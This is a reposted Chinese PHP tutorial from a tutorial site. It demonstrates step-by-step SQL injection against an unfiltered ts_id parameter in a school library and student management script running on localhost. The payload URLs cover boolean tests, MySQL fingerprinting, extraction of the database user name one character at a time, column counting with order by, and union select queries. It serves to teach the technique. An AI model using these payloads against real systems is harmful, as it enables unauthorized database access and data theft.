Home > php教程 > php手册 > 简单PHP注入演示

简单PHP注入演示

WBOY
Release: 2016-06-13 10:10:55
Original
1036 people have browsed it

学校的一个外聘老师写的程序,图书+学生管理系统,文件名001.php,002.php,003.php......(B名起的)问题出在004.php第多少行我也忘了,

简单PHP注入演示 书名:
注意这句,ts_id没有任何过滤,赤裸裸的等我们虐待,HOO~(虽然我知道数据库的一切信息,但是这里我还是要黑箱测试)
LET‘S GO~
http://localhost/zhd/004.php?ts_id=1 and 1=1 正常
http://localhost/zhd/004.php?ts_id=1 and 1=2 异常
白痴注入
判断数据库:
提交http://localhost/zhd/004.php?ts_id=1/*fenggou
正常返回,说明数据库支持/*注释,什么数据库支持/*呢?MYSQL!
读取用户名:
提交http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=114/*
正常返回,user()是MYSQL的内置函数,用来查看用户,这里是查看个用户名的第一个字符,没错114是ACCSLL中的"r",我是root连接,所以语句为真(这招贱心教我滴)但是如果用户名是rijnc的话我不是被骗了?所以在提交
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=116/* t
但是如果密码是rootrijnc,那我无语…
判断字段数:
提交http://localhost/zhd/004.php?ts_id=1 order by 10/*
失败,说明字段数小于10,一直试到7语句成立,一共是7个字段了,对我们以后的联合查询带来极大方便,有个小技巧,先5,在10,在15,依次一点点缩小范围
联合查询:
知道了字段数直接提交http://localhost/zhd/004.php?ts_id=1 union select 1,2,3,4,5,6,7/*
正常返回,说明支持union,把语句改改,用and 1=2让他显示错误,嘿嘿~~~
提交http://localhost/zhd/004.php?ts_id=1 and 1=2 union select 1,2,3,4,5,6,7/*
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Recommendations
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template